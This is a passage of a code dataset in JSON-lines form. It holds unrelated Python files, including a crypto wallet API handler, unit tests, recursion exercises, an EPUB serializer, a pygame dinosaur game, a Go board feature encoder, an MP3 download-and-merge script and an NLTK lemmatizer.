balance\n if not Tool.validate_address(address): return {'result':False, 'error':'wrong address'}\n #InvocationTransaction\n return {'result':True, 'transaction':tx}\n\n@post('/{net}/broadcast')\nasync def broadcast(net, request, *, publicKey, signature, transaction):\n #params validation\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n if not Tool.validate_cpubkey(publicKey): return {'result':False, 'error':'wrong publicKey'}\n result,msg = Tool.verify(publicKey, signature, transaction)\n if not result: return {'result':False, 'error':msg}\n tx = Tool.get_transaction(publicKey, signature, transaction)\n txid = Tool.compute_txid(transaction)\n result,msg = await send_raw_transaction(tx, request)\n if result:\n return {'result':True, 'txid':txid}\n return {'result':False, 'error':msg}\n\n@options('/{net}/transfer')\nasync def transfer_options(net, request):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n return 'OK'\n@options('/{net}/gas')\nasync def gas_options(net, request):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n return 'OK'\n@options('/{net}/broadcast')\nasync def broadcast_options(net, request):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n return 'OK'\n","sub_path":"www/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":20167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650786486","text":"from xml.etree.ElementTree import tostring\nimport lxml.etree as ETree\n\nclass XMLParser:\n\n xmlParsar = None\n\n def getInstance():\n if XMLParser.xmlParsar == None:\n XMLParser.xmlParsar = XMLParser()\n\n return XMLParser.xmlParsar\n\n def writeAndPretify(self, root, filename):\n itemFile = open(filename, \"w\")\n itemFile.write(str(tostring(root).decode(\"utf-8\")))\n itemFile.close()\n\n fileContent = ETree.parse(filename)\n itemFile = open(filename, \"w\")\n itemFile.write(str(ETree.tostring(fileContent, pretty_print=True).decode(\"utf-8\")))\n itemFile.close()\n","sub_path":"SPUGServer/XMLParsar.py","file_name":"XMLParsar.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641015859","text":"__author__ = 'Strinnityk'\n\nimport 
unittest\nfrom mock import Mock\n\nfrom py2neo import Node\n\nfrom app.Ingredient import Ingredient\n\n\nclass IngredientTests(unittest.TestCase):\n \n def test_exists_true(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.find_one = Mock(return_value = True)\n self.assertEqual(i.exists(m), True)\n\n def test_exists_false(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.find_one = Mock(return_value = False)\n self.assertEqual(i.exists(m), False)\n\n def test_exists_fail(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.find_one.side_effect = Exception()\n self.assertEqual(i.exists(m), 0)\n\n def test_add(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.merge_one = Mock(return_value = Node(\"Ingredient\", name = i.name))\n self.assertEqual(i.add(m)[\"name\"], i.name)\n\n def test_add_empty_name(self):\n m = Mock()\n i = Ingredient(\"\")\n m.merge_one = Mock(return_value = Node(\"\", name = i.name))\n self.assertEqual(i.add(m), None)\n\n def test_add_fail(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.merge_one.side_effect = Exception()\n self.assertEqual(i.add(m), 0)","sub_path":"tests/unittests/IngredientTests.py","file_name":"IngredientTests.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"380978094","text":"#! python3\r\n# recursion exercises\r\n\r\n#sum of a list of numbers\r\ndef sumOf(list):\r\n if len(list) == 1:\r\n return list[0]\r\n else:\r\n return list.pop() + sumOf(list)\r\n\r\n \r\n#alternative with lambda\r\nsums = lambda x: x[0] if len(x) == 1 else x[0]+sums(x[1:])\r\n##def sums(x):\r\n## if len(x) == 1:\r\n## return x[0]\r\n## else:\r\n## return x[0] + sums(x[1:])\r\n\r\nprint(sumOf([1,3,6])) #returns 10\r\nprint(sums([5,1,2])) #returns 8\r\n\r\n\r\n#sums of list with nested list\r\ndef theSums(list):\r\n total = 0\r\n for i in list:\r\n if type(i) is type([]):\r\n total = total + theSums(i)\r\n else:\r\n total = total + i\r\n return total\r\nprint(theSums([1, 2, [3,4], [5,6]]))\r\n \r\n\r\n#converting int to a word of base 26\r\ndef convert(int):\r\n base = 26\r\n strings = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n if int < base:\r\n return strings[int]\r\n else:\r\n return convert(int//base) + strings[int%base]\r\n\r\nprint(convert(28)) #returns BC\r\nprint(convert(51246)) #returns CXVA\r\n\r\n\r\n#factorial of a non-negative integer\r\ndef factorial(int):\r\n if int <= 1:\r\n return int\r\n else:\r\n return int*factorial(int-1)\r\n\r\nprint(factorial(5)) #returns 120\r\n\r\n\r\n#calculate the power with recursion\r\ndef powerOf(int, pw):\r\n if pw == 0:\r\n return 1\r\n elif pw == 1:\r\n return int\r\n else:\r\n return int * powerOf(int, pw-1)\r\n#lambda version\r\npower = lambda x,y: 1 if y==0 else(x if y==1 else x*power(x,y-1))\r\n\r\nprint(powerOf(4,5)) #returns 1024\r\nprint(power(4,5)) #returns 1024\r\n\r\n\r\n#finding the greatest common divisor of two integers\r\ndef cmDiv(a,b):\r\n high = max(a,b)\r\n low = min(a,b)\r\n\r\n if low == 0:\r\n return high\r\n elif low == 1:\r\n return 1\r\n else:\r\n return cmDiv(low, high%low)\r\n\r\nprint(cmDiv(123,7)) #returns 1\r\nprint(cmDiv(144,24)) #returns 24\r\n","sub_path":"recursionExercises.py","file_name":"recursionExercises.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"76235398","text":"# -*- coding: utf-8 -*-\nimport os\nimport time\nimport urllib\nfrom zipfile import 
ZipFile, ZipInfo\n\n# thirdparty:\nfrom rest_framework import serializers\n\n\nclass BookSerializer(serializers.Serializer):\n order_hash = serializers.CharField(max_length=32)\n file_url = serializers.URLField()\n\n def validate(self, data):\n url = data['file_url']\n order_hash = data['order_hash']\n if url and order_hash:\n try:\n # get file name and save\n file_name = os.path.basename(os.path.realpath(url))\n urllib.urlretrieve(url, file_name)\n\n # get data from file\n epub_old = ZipFile(file_name, 'r')\n txt = epub_old.read(\"META-INF/container.xml\")\n epub_old.close()\n\n # rewrite file and add comment\n epub_new = ZipFile(file_name, 'w')\n epub_new.writestr('mimetype', 'application/epub+zip')\n info = ZipInfo(\"META-INF/container.xml\", date_time=time.localtime(time.time()))\n info.comment = '%s at %s' % (order_hash, time.strftime(\"%d/%m/%Y\"))\n epub_new.writestr(info, txt)\n epub_new.close()\n except:\n raise serializers.ValidationError(\"Some error with file or not correct url\")\n return file_name\n return data\n","sub_path":"server/project/apps/books/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95146654","text":"import pygame\r\nimport pygame.locals\r\nimport os\r\nimport sys\r\nimport random\r\n\r\npygame.init()\r\n#pygame.init() initializes each of the modules in pygame.\r\n\r\nsizewd=720#display screen width\r\nsizeht=480#display screen height\r\nHW=720/2\r\nHH=480/2\r\nWHITE=(255,255,255)\r\nmindist=280\r\n\r\nwin=pygame.display.set_mode((sizewd,sizeht))\r\nclock=pygame.time.Clock()\r\nbg=pygame.image.load(os.path.join(\"sprites\",\"ground.png\"))\r\n\r\npygame.display.set_caption(\"dino\")#caption for the dispaly screen\r\n\r\nwin.fill((255,255,255))\r\n\r\nFPS=40\r\n\r\ncentre_handle=0\r\nindex=0\r\nspeed=8\r\n\r\n\t\t\t\t\r\n\r\n\r\n\r\nclass dino:\r\n\tdef __init__(self,filename,col):\r\n\t\tself.sheet=pygame.image.load(filename)\r\n\t\tself.col=col\r\n\t \r\n\t\t#self.row=row\r\n\t\t#self.totcellcount=row*col\r\n\t\tself.rect=self.sheet.get_rect()\r\n\t\tw=self.cellwidth=self.rect.width/col\r\n\t\th=self.cellheight=self.rect.height\r\n\t\thw,hh=self.cellcentre=(w/2,h/2)\r\n\r\n\t\tself.cell=list([(index%col*w,0,w,h)for index in range(self.col)])\r\n\t\t\r\n\t\tself.jumping=False\r\n\t\tself.running=True\r\n\t\tself.ducking=False\r\n\t\t\r\n\t\tself.jumpcount=0\r\n\t\tself.con=0\r\n\t\tself.keydown=0\r\n\t\tself.timelapsed=0\r\n\t\r\n\r\n\t \r\n\t\tself.handle=list([(0,0),(-hw,0),(-w,0),(0,-hh),(-hw,hh),(w,-hh),(0,-h),(-hw,h),(w,-h)])\r\n\r\n\tdef run(self,surface,cellindex,x,y,handle=0):\r\n\t\tsurface.blit(self.sheet,(x+self.handle[handle][0],y+self.handle[handle][1]),self.cell[cellindex%4])\r\n\t\tpygame.display.update(x+self.handle[handle][0],y+self.handle[handle][1],self.cellwidth,self.cellheight)\r\n\t\t\r\n\tdef jump(self,surface,x,y,cellindex):\r\n\t\t\r\n\t\tsurface.blit(self.sheet,(x+self.handle[0][0],y+self.handle[0][1]),self.cell[cellindex]) \r\n\t\tpygame.display.update(x+self.handle[0][0],y+self.handle[0][1],self.cellwidth,self.cellheight)\r\n\r\n\tdef duck(self,surface,filename,index):\r\n\t\tself.img=pygame.image.load(filename)\r\n\r\n\t\tcw=self.img.get_rect().width/2\r\n\t\tch=self.img.get_rect().height\r\n\t\tsurface.blit(self.img,(120,HH),(index*cw,0,cw,ch))\r\n\t\tpygame.display.update(120,HH,cw,ch)\t\r\n\tdef redraw(self,surface,index):\r\n\t\trel=(index*-speed)%1203\r\n\t\tsurface.fill(WHITE) 
\r\n\t\tsurface.blit(bg,(rel-1203,HH+75),(0,0,bg.get_rect().width,bg.get_rect().height ))\r\n\t\tif rel100 :\r\n\t\t\t\t\tself.jumpcount=13\r\n\t\t\t\tself.con=self.jumpcount\t\r\n\t\t\t\tself.jumping=True\r\n\r\n\t\t\t#__________________________________DETECTING DUCK button PRESSES______________________________________\r\n\t\t\tif eve.type==pygame.locals.KEYDOWN and eve.key==pygame.K_DOWN :\r\n\t\t\t\ts.ducking=True\r\n\r\n\t\t\t\t# if self.jumpcount>=-self.con:\r\n\t # neg=0.5\r\n\t # if self.jumpcount<0:\r\n\t # neg=-0.5\r\n\t # self.y-=(self.jumpcount**2)*0.5*neg\r\n\t # self.jumpcount-=1\r\n\t\t\t\t# \tself.con=self.jumpcount\t\r\n\t\t\t\t# \tself.jump(win,120,self.HH,1)\t\t \r\nclass objects():\r\n\tdef __init__(self,x=0):\r\n\t\tself.cact=pygame.image.load(os.path.join(\"sprites\",\"cacti-small.png\"))\r\n\t\tself.cactrect=self.cact.get_rect()\r\n\t\tself.cactwi=self.cactrect.width/6\r\n\t\tself.cacthe=self.cactrect.height\r\n\t\t# self.cactcell=list([(i*self.cactwi,0,self.cactwi,self.cacthe) for i in range(0,6)])\r\n\t\tself.cactcell=list([(0,0,self.cactwi,self.cacthe),(self.cactwi,0,2*self.cactwi,self.cacthe),(3*self.cactwi,0,3*self.cactwi,self.cacthe)])\r\n#y coordinate for spawning cactcell spite= (HH+22)\r\n#y coordinate for spawning CACTcell spite= (HH+7)\r\n\t\tself.xcoordinate=sizewd+x\r\n\t\tself.CACT=pygame.image.load(os.path.join(\"sprites\",\"cacti-big.png\"))\r\n\t\tself.CACTrect=self.CACT.get_rect()\r\n\t\tself.CACTwi=50\r\n\t\tself.CACThe=self.CACTrect.height\r\n\t\tself.CACTcell=list([(0,0,self.CACTwi,self.CACThe),(50,0,100,self.CACThe),(150,0,50,self.CACThe),(200,0,50,self.CACThe)])\r\n\t\tself.Rand=random.randint(0,5)\r\n\tdef draw(self,surface):\r\n\t\tself.xcoordinate+=-speed\r\n\t\t\r\n\t\t# print(self.xcoordinate)\r\n\t\tif self.Rand<3:\r\n\t\t\tsurface.blit(self.CACT,(self.xcoordinate-self.CACTwi,HH-7),self.CACTcell[self.Rand])\t\t\t\r\n\t\telse:\r\n\t\t\tsurface.blit(self.cact,(self.xcoordinate-self.cactwi,HH+22),self.cactcell[self.Rand%3])\r\n\t\t\r\no1=objects()\r\no2=objects(random.randint(250,350))\r\n\r\ns=dino(os.path.join(\"sprites\",\"dino.png\"),5)\r\ny=HH\r\nduckc=[0,1]\r\ni=1\r\nrun=True\r\nwhile run:\r\n\t\t\tclock.tick(50)\r\n\t\r\n\t\t\ts.events()\r\n\r\n\t\t\tkey=pygame.key.get_pressed() \r\n\t\t\tif not s.jumping and not s.ducking:\r\n\t\t\t\tif s.running:\r\n\t\t\t\t\ts.run(win,index%s.col,120,HH,centre_handle)\r\n\t\t\t\t# if key[pygame.K_DOWN]:#DUCKKING\r\n\t\t\t\t# \ts.ducking=True\r\n\t\t\t\t# \ts.running=False\r\n\r\n\t\t\t\t# elif key[pygame.K_SPACE] or key[pygame.K_UP]:\r\n\t\t\t\t# \ts.jumping=True\r\n\t\t\t\t# \ts.running=False \r\n\t\t\telif s.ducking:\r\n\t\t\t\t\r\n\t\t\t\tif(i%2==0)and not key[pygame.K_DOWN]:\r\n\t\t\t\t\ts.ducking=False\r\n\t\t\t\t\ts.running=True\r\n\t\t\t\t\ts.duck(win,os.path.join(\"sprites\",\"dino_ducking.png\"),i%2)\t\r\n\t\t\t\telse:\r\n\t\t\t\t\ts.duck(win,os.path.join(\"sprites\",\"dino_ducking.png\"),i%2)\r\n\t\t\t\ti+=1\t\t\t\r\n\t\t\t\t\r\n\t\t\telif s.jumping :\r\n\t\t\t\r\n\t\t\t\tif s.jumpcount>=-s.con:\r\n\t\t\t\t\tneg=0.4\r\n\t\t\t\t\tif s.jumpcount<0:\r\n\t\t\t\t\t\tneg=-0.4\r\n\t\t\t\t\ty-=(s.jumpcount**2)*0.5*neg\r\n\t\t\t\t\ts.jump(win,120,y,index%4)\r\n\t\t\t\t\ts.jumpcount-=1\r\n\t\t\t\tif s.jumpcount<-s.con:\r\n\t\t\t\t\ts.jumping=False\r\n\t\t\t\t\t\r\n\t\t\t\t\ty=HH\r\n\t\t\t\t\tpygame.event.set_allowed(pygame.locals.KEYDOWN)\r\n\t\t\t\t\t# win.blit(o.CACT,(120+s.cellwidth,HH-7),o.cell[2])\t\t\t\r\n\t\t\t# 
win.blit(o.cact,(120+s.cellwidth,HH+22),o.cactcell[2])\r\n\t\t\tpygame.display.update()\r\n\t\t\ts.redraw(win,index)\r\n\t\t\t\r\n\t\t\to1.draw(win)\r\n\t\t\t\r\n\t\t\to2.draw(win)\r\n\t\t\r\n\t\t\tif(o1.xcoordinate<=0):\r\n\t\t\t\to1.Rand=random.randint(0,6)\r\n\t\t\t\to1.xcoordinate=sizewd\r\n\t\t\tif(o2.xcoordinate<=0):\r\n\t\t\t\to2.Rand=random.randint(0,6)\r\n\t\t\t\to2.xcoordinate=sizewd+random.randint(250,350)\t\r\n\t\t\tindex+=1\r\n\t\t\r\n\t\r\n\t\r\n","sub_path":"dino.py","file_name":"dino.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"583450344","text":"\ndef counting_sort(arr):\n \"\"\"\n Counting sort: first find the maximum and minimum of the sequence and build a new list that counts how many times each value occurs; then write the values recorded in that list back into arr to sort it\n :param arr:\n :return:\n \"\"\"\n max = arr[0]\n min = arr[0]\n for ele in arr:\n if ele < min:\n min = ele\n if ele>max:\n max = ele\n count = [0]*(max-min+1)\n\n #count occurrences\n for ele in arr:\n count[ele-min]+=1\n\n #write the values back\n index = 0\n for i in range(len(count)):\n #when count[i] == 0 the for loop body simply never runs\n for ele in range(count[i]):\n arr[index] = i+min\n index += 1\n\n print(*arr)\n\n\n\n\nif __name__ == '__main__':\n arr = [10, 2, 5, 1, 3, 7, 3, 1525, 0]\n print(arr)\n counting_sort(arr)\n\n","sub_path":"7_counting_sort.py","file_name":"7_counting_sort.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"358076904","text":"\"\"\"\nPlease keep the code which we need for testing here.\n\"\"\"\n\nimport numpy as np\nimport enum\nfrom collections import namedtuple\nfrom copy import deepcopy\n\n\n\n\"\"\"\nConvert to make the plane for Black (Game State representation assumed: Black(1), White(2) and empty(0))\n\"\"\"\ndef convert2to0(game_state):\n if game_state is None:\n print(\"game_state is None\")\n return None\n \n board = deepcopy(game_state.board)\n white_points = [(i,j) for i in range(5) for j in range(5) if board.grid[i][j] == 2]\n for row,col in white_points:\n board.grid[row][col] = 0\n return board.grid\n\n\"\"\"\nConvert to make the plane for White (Game State representation assumed: Black(1), White(2) and empty(0))\n\"\"\"\ndef convert2to1and1to0(game_state):\n if game_state is None:\n print(\"game_state is None\")\n return None\n \n board = deepcopy(game_state.board)\n black_points = [(i,j) for i in range(5) for j in range(5) if board.grid[i][j] == 1]\n for row,col in black_points:\n board.grid[row][col] = 0\n white_points = [(i,j) for i in range(5) for j in range(5) if board.grid[i][j] == 2]\n for row,col in white_points:\n board.grid[row][col] = 1 \n return board.grid\n \n\n\n\nclass Player(enum.Enum):\n black = 1\n white = 2\n\n @property\n def other(self):\n return Player.black if self == Player.white else Player.white\n\nclass Point(namedtuple('Point', 'row col')):\n def neighbors(self):\n return [\n Point(self.row - 1, self.col),\n Point(self.row + 1, self.col),\n Point(self.row, self.col - 1),\n Point(self.row, self.col + 1),\n ]\n\n def __deepcopy__(self, memodict={}):\n # These are very immutable.\n return self\n\nclass Board:\n def __init__(self, num_rows, num_cols):\n self.num_rows = num_rows\n self.num_cols = num_cols\n self.grid = []\n\n def new_game(self):\n self.grid = np.zeros((self.num_rows, self.num_cols))\n\n def print_board(self):\n print(self.grid)\n \nclass GameState:\n def __init__(self, board, current_player, previous):\n self.board = board\n self.current_player = current_player\n self.previous_state = previous\n\n def 
playGame(self, coord):\n next_board = deepcopy(self.board)\n row, col = coord\n val = 0\n if self.current_player == Player.black:\n val = 1\n else:\n val = 2\n next_board.grid[int(row)][int(col)] = val\n next_game_state = GameState(next_board, self.current_player.other, self)\n return next_game_state\n \n\n def display(self):\n print(\"Current Player : \", self.current_player)\n game_state = self\n while(game_state):\n print(\"board for player :\", game_state.current_player)\n print(game_state.board.grid)\n game_state = game_state.previous_state\n\nnum_planes = 7\n\nFEATURE_OFFSETS = {\n \"current_player\": 0, # <1>\n \"base_self_history\": 1, # <2>\n \"base_opp_history\": 1 + int((num_planes-1)/2) # <3>\n}\n\n# <1> Plane[0]\n# <2> Plane [1,2,3,4,5,6,7,8] or [1,2,3]\n# <3> Plane [9, 10, 11, 12, 13, 14, 15, 16] or [4,5,6] (num_planes is coming from global config file)\n\ndef offset(feature):\n return FEATURE_OFFSETS[feature]\n\n\n\n\nclass TrojanGoPlane():\n def __init__(self, board_size, plane_size):\n self.board_width, self.board_height = board_size\n self.num_planes = plane_size\n\t \n def name(self):\n return 'trojangoplane'\n\n # Need to define Point, Player, game_state (previous game_state info, 1 black, 2 white and 0 for blank point)\n def encode(self, game_state): # <1> \n board_tensor = np.zeros(self.shape()) # (17*19*19)\n\n plane_history = 1\n opp = True\n myself = False\n iter_base_opp = 0\n iter_base_self = 0\n\n if game_state.current_player == Player.black:\n board_tensor[offset(\"current_player\")] = np.ones([1, self.board_width, self.board_width])\n if game_state.current_player == Player.white:\n board_tensor[offset(\"current_player\")] = np.zeros([1, self.board_width, self.board_width]) \n\n current_player = game_state.current_player\n while game_state and plane_history <= (num_planes - 1):\n if game_state is None:\n #print(\"I WAS EXPECTING TO BREAK THE WHILE LOOP, do it now ...\")\n #break\n raise ValueError(\"encoding history must have neen done by this time ...\")\n \n if (opp):\n # from current player point of view, current game_state is first history\n # game_state of opposition. 
So, it should go in opposition base plane.\n # 2->1 & 1->0 (if game_state.current_player == Player.black),\n # and 2->0(if game_state.current_player == Player.white)\n \n if current_player == Player.black:\n board_plane = convert2to1and1to0(game_state)\n else:\n board_plane = convert2to0(game_state) \n \n\n board_tensor[offset(\"base_opp_history\") + iter_base_opp] = board_plane\n plane_history += 1\n iter_base_opp += 1\n opp = False\n myself = True\n game_state = game_state.previous_state\n \n elif (myself):\n # 2->0 (if game_state.current_player == Player.black)5,\n # and 2->1 & 1->0 (if game_state.current_player == Player.white)\n \n if current_player == Player.black:\n board_plane = convert2to0(game_state)\n else:\n board_plane = convert2to1and1to0(game_state)\n \n board_tensor[offset(\"base_self_history\") + iter_base_self] = board_plane\n plane_history += 1\n iter_base_self+= 1\n opp = True\n myself = False\n game_state = game_state.previous_state\n \n \n else:\n raise ValueError(\"INVALID PLAY LANDING\")\n\n \"\"\"\n return board_tensor\n s{t} = [C, X{t=2}, X{t=1}, X{t=0}, Y{t=2}, Y{t=1}, Y{t=0}]\n \n AlphaZero: These planes are concatenated together to give input features\n s{t} = [X{t}, Y{t}, X{t−1}, Y{t−1},..., X{t−7}, Y{t−7}, C].\n So, re-sequence it to align with AlphaGoZero.\n \"\"\"\n \n new_board_tensor = np.zeros(self.shape())\n new_board_tensor[-1] = board_tensor[0]\n\n j = (self.num_planes - 1) / 2 # number of history staes for any player\n j = int(j)\n k = -1\n for i in range(self.num_planes - 1):\n if i%2 == 0: # current player planes re-sequencing X{t}\n new_board_tensor[i] = board_tensor[i+ (-1 * k)]\n k = k+1\n else: # opp player planes re-sequencing Y{t}\n new_board_tensor[i] = board_tensor[i+j]\n j = j-1\n \n \n return new_board_tensor # AlphaGoZero complaint\n\n \n def encode_point(self, point):\n raise NotImplementedError()\n\n def num_points(self):\n return self.board_width * self.board_height\n\n def shape(self):\n return self.num_planes, self.board_height, self.board_width\n\n# <1> Encode the input feature (board_size * board_size * num_planes)\n\ndef create(board_size, num_planes, gamestate):\n trojangoplane = TrojanGoPlane((board_size, board_size), num_planes)\n return trojangoplane.encode(game_state)\n\n\n \n\n\nif __name__ == \"__main__\":\n board = Board(5,5)\n board.new_game()\n #board.print_board()\n\n # black is starting the game, board is all empty now.\n game_state = GameState(board, Player.black, None)\n #print(game_state.display())\n\n # Simulate a game for making 3-3 moves for black and white.\n #moves = [(2,2), (2,3), (2,1), (3,3), (1,1), (1,2)]\n moves = [(2,2), (2,3), (2,1), (3,3), (1,1), (1,2), (4,4), (0,0)]\n #moves = [(2,2), (2,3), (2,1), (3,3)]\n \n for coord in moves:\n game_state = game_state.playGame(coord)\n \n print(game_state.display())\n\n #now get an input feature stack\n planes_tensor = create(5, 7, game_state)\n\n print(\"Turn to make move is player : \", game_state.current_player)\n print(\"Input feature stacks ...\")\n print(planes_tensor)\n \n\n \n \n\n","sub_path":"code/algos/encoders/trojangoPlane_test.py","file_name":"trojangoPlane_test.py","file_ext":"py","file_size_in_byte":8955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337003796","text":"import requests\nimport os,sys\nimport time\nfrom PIL import Image\nfrom bs4 import BeautifulSoup\nfrom StringIO import StringIO\n \ndef 
lastItems(URL):\n\treq1=requests.get(url)\n\tobj=BeautifulSoup(req1.content)\n\tnames=[]\n\tif req1.status_code == 200:\n\t\tfor i in obj.find_all(\"a\"):\n\t\t\tnames.append(i.text)\n\treturn names\ndef totalQari(url):\n\tcount=0\n\treq3=requests.get(url)\n\tobj1=BeautifulSoup(req3.content)\n\ttotalqari=0\n\tif req3.status_code ==200:\n\t\tfor k in obj1.find_all(\"a\"):\n\t\t\tcount=count+1\n\t\t\t\n\treturn count\n\ncount=0\ncc=0\nurl3=\"https://download.quranicaudio.com/quran/\"\nf=open(\"logfile\",\"w+\")\ncount=totalQari(url3)\n\nst=str(time.strftime(\"%c\"))+\" \"+\"TOTAL QARI : \"+str(count)\nf.write(st)\nf.write(\"\\n\")\nreq=requests.get(\"https://download.quranicaudio.com/quran/\")\nif req.status_code == 200:\n\tparser_obj = BeautifulSoup(req.content);\n\t\n\tfor i in parser_obj.find_all(\"a\"):\n\t\tpath = i.text \n\t\t\n\t\tif not os.path.exists(path):\n\t\t\tos.makedirs(path)\n\t\t\tos.chdir(path)\n\t\t\turl=\"https://download.quranicaudio.com/quran/\"+path\n\t\t\t\n\t\t\tname =lastItems(url)\n\t\t\tcc=cc+1\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"START PROCESSING : \"+str(cc)+\"out of \"+str(count)\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"QARI NAME : \"+str(path)\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\n\t\t\t\n\t\t\tfor j in name[-26:]:\t\t\t\n\t\t\t\turl2= url+j\n\t\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"QARI NAME : \"+str(path)+\" \"+\"FILENAME : \"+str(j)+\"START\"\n\t\t\t\tf.write(st)\n\t\t\t\tf.write(\"\\n\")\n\t\t\t\tr = requests.get(url2)\n\t\t\t\twith open(j,\"wb\") as code:\n\t\t\t\t\tcode.write(r.content)\n\t\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"QARI NAME : \"+str(path)+\" \"+\"FILENAME : \"+str(j)+\"END\"\n\t\t\t\tf.write(st)\n\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\n\t\t\t\t\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"MERGING FILE OF QARI NAME : \"+str(path)+\" \"+\"START\"\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\n\t\t\t\n\t\t\tos.system(\"mp3wrap secondHalf.mp3 *.mp3\")\n\t\t\t\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"MERGING FILE OF QARI NAME : \"+str(path)+\" \"+\"END\"\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\tos.chdir(\"../\")\n\t\t\t\t\t\t\t\n","sub_path":"Assignment 02/task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224922758","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLemmatizes the given input column, i.e. modifies inflected or variant forms \nof a word into its lemma.\n\nCreated on Fri Oct 8 11:18:30 2021\n\n@author: dhesenkamp\n\"\"\"\n\nfrom code.preprocessing.preprocessor import Preprocessor\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import wordnet\nfrom nltk import pos_tag\nfrom ast import literal_eval\n\n\nclass Lemmatizer(Preprocessor):\n \"\"\"\n Lemmatize given input column.\n inspired by https://www.machinelearningplus.com/nlp/lemmatization-examples-python/\n \"\"\"\n \n \n def __init__(self, input_column, output_column):\n \"\"\"Constuctor, calls super Constructor.\"\"\"\n super().__init__([input_column], output_column)\n \n \n # implementation of _set_variables() not necessary\n \n \n def _get_values(self, inputs):\n \"\"\"\n Lemmatize given input based on WordNet. 
Also changes to lowercase.\n \"\"\"\n lemmatizer = WordNetLemmatizer()\n \n # dict to map PoS to arg accepted by lemmatize()\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV\n }\n \n column = []\n \n for tweet in inputs[0]:\n tweet_eval = literal_eval(tweet)\n lemmatized = []\n \n for word in tweet_eval:\n # get first letter of PoS tag to retrieve entry from dict\n tag = pos_tag([word])[0][1][0].upper()\n lemmatized.append(lemmatizer.lemmatize(word.lower(), tag_dict.get(tag, wordnet.NOUN)))\n column.append(lemmatized)\n \n return column","sub_path":"code/preprocessing/lemmatizer.py","file_name":"lemmatizer.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"566934028","text":"\"\"\"\nTEST_OPTIMA\n\nWhile optima.py is a demonstration of everything Optima can do, this is used to\ntest specific features.\n\nVersion: 2015jan18 by cliffk\n\"\"\"\n\n\nprint('WELCOME TO OPTIMA')\n\n## Set parameters\nprojectname = 'example'\nverbose = 2\nshow_wait = False\nnsims = 5\ntimelimit = 10\n\nspaces = 10\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING BASIC FUNCTIONS')\nprint('======================================================================')\n\nprint('\\n\\n\\n1. Making project...')\nfrom makeproject import makeproject\nD = makeproject(projectname=projectname, pops=['']*6, progs = ['']*7, datastart=2000, dataend=2015, verbose=verbose)\nD['opt']['nsims'] = nsims # Reset options\n\nprint('\\n\\n\\n2. Updating data...')\nfrom updatedata import updatedata\nD = updatedata(D, verbose=verbose)\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING MANUAL FITTING')\nprint('======================================================================')\n\n\nprint('\\n\\n\\n4. Setting up manual fitting...')\nfrom numpy import array, zeros\n\n\n# Change F\nF = D['F'][0]\nF['force'] = array(F['force']) * 0.5\n\n# Some changes to improve MSM fitting\nPlist = [{'name':['const','trans','mmi'], 'data':5e-4}, \\\n {'name':['const','trans','mmr'], 'data':1e-3}]\n\n# Artifical change just to demonstrate changing M\ntmp = zeros((D['G']['npops'], len(D['opt']['partvec'])))\nfor p in range(D['G']['npops']): tmp[p,:] = 200+(D['opt']['partvec']-2000)*50\nMlist = [{'name':['numacts','com'], 'data':tmp}]\n\n\nprint('\\n\\n\\n5. Running manual fitting...')\nfrom manualfit import manualfit\nD = manualfit(D, F=F, Plist=Plist, Mlist=Mlist, simstartyear=2000, simendyear=2015, verbose=2)\n\n\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING AUTOMATIC 